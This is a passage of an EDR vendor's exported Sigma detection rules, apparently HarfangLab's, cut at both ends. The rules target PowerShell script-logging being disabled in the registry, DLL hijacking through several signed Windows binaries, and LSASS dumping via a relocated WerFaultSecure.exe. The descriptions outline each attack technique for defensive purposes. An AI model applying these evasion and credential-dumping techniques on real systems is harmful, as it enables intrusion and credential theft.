"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623027Z",
"creation_date": "2026-03-23T11:45:34.623029Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623033Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell/tree/master?tab=readme-ov-file#disable-script-logging",
"https://attack.mitre.org/techniques/T1112/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1112_script_block_logging_disabled_registry.yml",
"content": "title: Script Block Logging Disabled in Registry\nid: 191f1aa8-40cc-4b37-b39c-8821d11b97d5\ndescription: |\n Detects the EnableScriptBlockLogging value being set to 0 in registry.\n Attackers can disable the logging of PowerShell scripts by changing the value of EnableScriptBlockLogging to 0 in registry in order to avoid PowerShell detections.\n It is recommended to investigate the process that did this modification, as well as its execution context.\nreferences:\n - https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell/tree/master?tab=readme-ov-file#disable-script-logging\n - https://attack.mitre.org/techniques/T1112/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2025/08/29\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n Details: 'DWORD (0x00000000)'\n TargetObject|contains: 'EnableScriptBlockLogging'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_lgpo:\n ProcessImage|endswith: '\\LGPO.exe'\n ProcessSignature: 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_nable:\n - ProcessParentImage:\n - '?:\\Program Files 
(x86)\\N-able Technologies\\AutomationManagerAgent\\AutomationManager.AgentService.exe'\n - '?:\\Program Files (x86)\\N-able Technologies\\Windows Agent\\bin\\agent.exe'\n - ProcessImage:\n - '?:\\Program Files (x86)\\N-able Technologies\\AutomationManagerAgent\\AutomationManager.AgentService.exe'\n - '?:\\Program Files (x86)\\N-able Technologies\\Windows Agent\\bin\\agent.exe'\n\n exclusion_monitoring_agent:\n ProcessImage:\n - '?:\\Program Files (x86)\\Advanced Monitoring Agent GP\\ScriptRunner\\ScriptRunner.exe'\n - '?:\\Program Files (x86)\\Advanced Monitoring Agent\\ScriptRunner\\ScriptRunner.exe'\n\n exclusion_mmc:\n ProcessCommandLine: '?:\\Windows\\system32\\mmc.exe ?:\\Windows\\system32\\\\*'\n\n exclusion_checkpoint:\n ProcessImage|startswith: '?:\\Program Files (x86)\\CheckPoint\\'\n ProcessSignature: 'Check Point Software Technologies Ltd.'\n ProcessSigned: 'true'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\nissrv.exe'\n - '?:\\Program Files\\Windows Defender\\MsMpEng.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n\n exclusion_windows:\n - ProcessImage:\n - '?:\\windows\\system32\\msiexec.exe'\n - '?:\\windows\\syswow64\\msiexec.exe'\n - '?:\\windows\\system32\\deviceenroller.exe'\n - '?:\\windows\\syswow64\\deviceenroller.exe'\n - '?:\\windows\\system32\\omadmclient.exe'\n - '?:\\windows\\syswow64\\omadmclient.exe'\n - '?:\\windows\\system32\\vmms.exe'\n - '?:\\windows\\syswow64\\vmms.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n - '?:\\Windows\\CCM\\CcmExec.exe'\n - ProcessParentImage: '?:\\Windows\\CCM\\CcmExec.exe'\n\n exclusion_ishealth:\n ProcessImage:\n - '?:\\Program Files (x86)\\IS-Health\\IS-Health\\IS-Health.exe'\n - '?:\\Program Files\\IS-Health\\IS-Health\\IS-Health.exe'\n\n exclusion_trendmicro:\n 
ProcessImage: '?:\\Program Files\\Trend Micro\\Cloud Endpoint\\CloudEndpointService.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "191f1aa8-40cc-4b37-b39c-8821d11b97d5",
"rule_name": "Script Block Logging Disabled in Registry",
"rule_description": "Detects the EnableScriptBlockLogging value being set to 0 in the registry.\nAttackers can disable the logging of PowerShell scripts by setting EnableScriptBlockLogging to 0 in the registry in order to evade PowerShell-based detections.\nIt is recommended to investigate the process that made this modification, as well as its execution context.\n",
"rule_creation_date": "2025-08-29",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1982114f-b8b0-4ab1-8856-9eb7baf58dd8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080714Z",
"creation_date": "2026-03-23T11:45:34.080716Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080720Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/0gtweet/status/1477925112561209344",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_format_com.yml",
"content": "title: DLL Hijacking via format.com\nid: 1982114f-b8b0-4ab1-8856-9eb7baf58dd8\ndescription: |\n Detects potential Windows DLL Hijacking via format.com.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers could use this technique by copying legitimate Windows signed executable from System32 or SysWow64 directory to a non-standard directory and plant a malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/0gtweet/status/1477925112561209344\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/01/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'format.com'\n ProcessSignature: 'Microsoft Windows'\n #ImageLoaded: '*.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1982114f-b8b0-4ab1-8856-9eb7baf58dd8",
"rule_name": "DLL Hijacking via format.com",
"rule_description": "Detects potential Windows DLL Hijacking via format.com.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers could use this technique by copying a legitimate Windows-signed executable from the System32 or SysWOW64 directory to a non-standard directory and planting a malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-01-05",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "198dc4a0-fad3-4a63-96df-c66da0fff340",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078646Z",
"creation_date": "2026-03-23T11:45:34.078648Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078652Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wifitask.yml",
"content": "title: DLL Hijacking via wifitask.exe\nid: 198dc4a0-fad3-4a63-96df-c66da0fff340\ndescription: |\n Detects potential Windows DLL Hijacking via wifitask.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wifitask.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\HTTPAPI.dll'\n - '\\IPHLPAPI.DLL'\n - '\\umpdc.dll'\n - '\\webservices.dll'\n - '\\wlanapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "198dc4a0-fad3-4a63-96df-c66da0fff340",
"rule_name": "DLL Hijacking via wifitask.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wifitask.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting a malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "19d12965-f4b4-469a-b904-87bd6dc211d8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595087Z",
"creation_date": "2026-03-23T11:45:34.595091Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595099Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dsrm.yml",
"content": "title: DLL Hijacking via dsrm.exe\nid: 19d12965-f4b4-469a-b904-87bd6dc211d8\ndescription: |\n Detects potential Windows DLL Hijacking via dsrm.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dsrm.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\activeds.dll'\n - '\\secur32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "19d12965-f4b4-469a-b904-87bd6dc211d8",
"rule_name": "DLL Hijacking via dsrm.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dsrm.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate executable and planting a malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1a1f6e7a-2498-43ab-a378-5c398ec012d1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092694Z",
"creation_date": "2026-03-23T11:45:34.092696Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092701Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://www.hexacorn.com/blog/2015/02/23/beyond-good-ol-run-key-part-28/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_recoverydrive.yml",
"content": "title: DLL Hijacking via RECOVERYDRIVE.exe\nid: 1a1f6e7a-2498-43ab-a378-5c398ec012d1\ndescription: |\n Detects potential Windows DLL Hijacking via RECOVERYDRIVE.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://www.hexacorn.com/blog/2015/02/23/beyond-good-ol-run-key-part-28/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'RECOVERYDRIVE.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\reagent.dll'\n - '\\unattend.dll'\n - '\\uxtheme.dll'\n - '\\vssapi.dll'\n - '\\wdscore.dll'\n - '\\wimgapi.dll'\n - '\\winhttp.dll'\n - '\\wofutil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1a1f6e7a-2498-43ab-a378-5c398ec012d1",
"rule_name": "DLL Hijacking via RECOVERYDRIVE.exe",
"rule_description": "Detects potential Windows DLL Hijacking via RECOVERYDRIVE.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate executable and planting a malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1a5344cf-01b1-4cce-92c3-e46480185079",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086161Z",
"creation_date": "2026-03-23T11:45:34.086163Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086168Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.zerosalarium.com/2025/09/Dumping-LSASS-With-WER-On-Modern-Windows-11.html",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_werfaultsecure_unknown_location.yml",
"content": "title: WerFaultSecure.exe Executed From a Non-Common Location\nid: 1a5344cf-01b1-4cce-92c3-e46480185079\ndescription: |\n Detects the execution of WerFaultSecure.exe from non-standard directories outside of System32, SysWOW64, and WinSxS.\n WerFaultSecure.exe is a Microsoft-signed binary used by Windows for Protected Process error reporting.\n Attackers can abuse this legitimate tool by copying a vulnerable version of it to alternative locations for process memory dumping, therefore bypassing security controls on protected processes.\n It is recommended to investigate the parent process and analyze any generated dump files for credential harvesting activities.\nreferences:\n - https://www.zerosalarium.com/2025/09/Dumping-LSASS-With-WER-On-Modern-Windows-11.html\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2025/09/15\nmodified: 2025/10/01\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1003.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName: 'WerFaultSecure.exe'\n\n filter_legitimate_folder:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n\n exclusion_serviceprotection:\n ParentImage: '?:\\Program Files\\ServiceProtection\\ServiceProtection.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'PHARMADATA PTY LTD'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1a5344cf-01b1-4cce-92c3-e46480185079",
"rule_name": "WerFaultSecure.exe Executed From a Non-Common Location",
"rule_description": "Detects the execution of WerFaultSecure.exe from non-standard directories outside of System32, SysWOW64, and WinSxS.\nWerFaultSecure.exe is a Microsoft-signed binary used by Windows for Protected Process error reporting.\nAttackers can abuse this legitimate tool by copying a vulnerable version of it to an alternative location for process memory dumping, thereby bypassing security controls on protected processes.\nIt is recommended to investigate the parent process and analyze any generated dump files for credential harvesting activity.\n",
"rule_creation_date": "2025-09-15",
"rule_modified_date": "2025-10-01",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1a60aaa8-4707-470a-bfa7-fcd2a9b3c464",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586727Z",
"creation_date": "2026-03-23T11:45:34.586731Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586739Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wordpad.yml",
"content": "title: DLL Hijacking via WORDPAD.exe\nid: 1a60aaa8-4707-470a-bfa7-fcd2a9b3c464\ndescription: |\n Detects potential Windows DLL Hijacking via WORDPAD.exe.\n DLL hijacking takes advantage of the default Windows DLL search order, in which the directory of the executable is searched before the system directories, so a DLL planted next to the application is loaded instead of the legitimate one.\n Attackers use this technique by copying the legitimate, signed executable to a directory they control and planting the malicious DLL alongside it.\n It is recommended to investigate the loaded library (location, signature and content) and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'WORDPAD.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcrypt.dll'\n - '\\dataexchange.dll'\n - '\\msctf.dll'\n - '\\msxml3.dll'\n - '\\netprofm.dll'\n - '\\npmproxy.dll'\n - '\\uiribbon.dll'\n - '\\windowscodecs.dll'\n - '\\edputil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1a60aaa8-4707-470a-bfa7-fcd2a9b3c464",
"rule_name": "DLL Hijacking via WORDPAD.exe",
"rule_description": "Detects potential Windows DLL Hijacking via WORDPAD.exe.\nDLL hijacking takes advantage of the default Windows DLL search order, in which the directory of the executable is searched before the system directories, so a DLL planted next to the application is loaded instead of the legitimate one.\nAttackers use this technique by copying the legitimate, signed executable to a directory they control and planting the malicious DLL alongside it.\nIt is recommended to investigate the loaded library (location, signature and content) and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
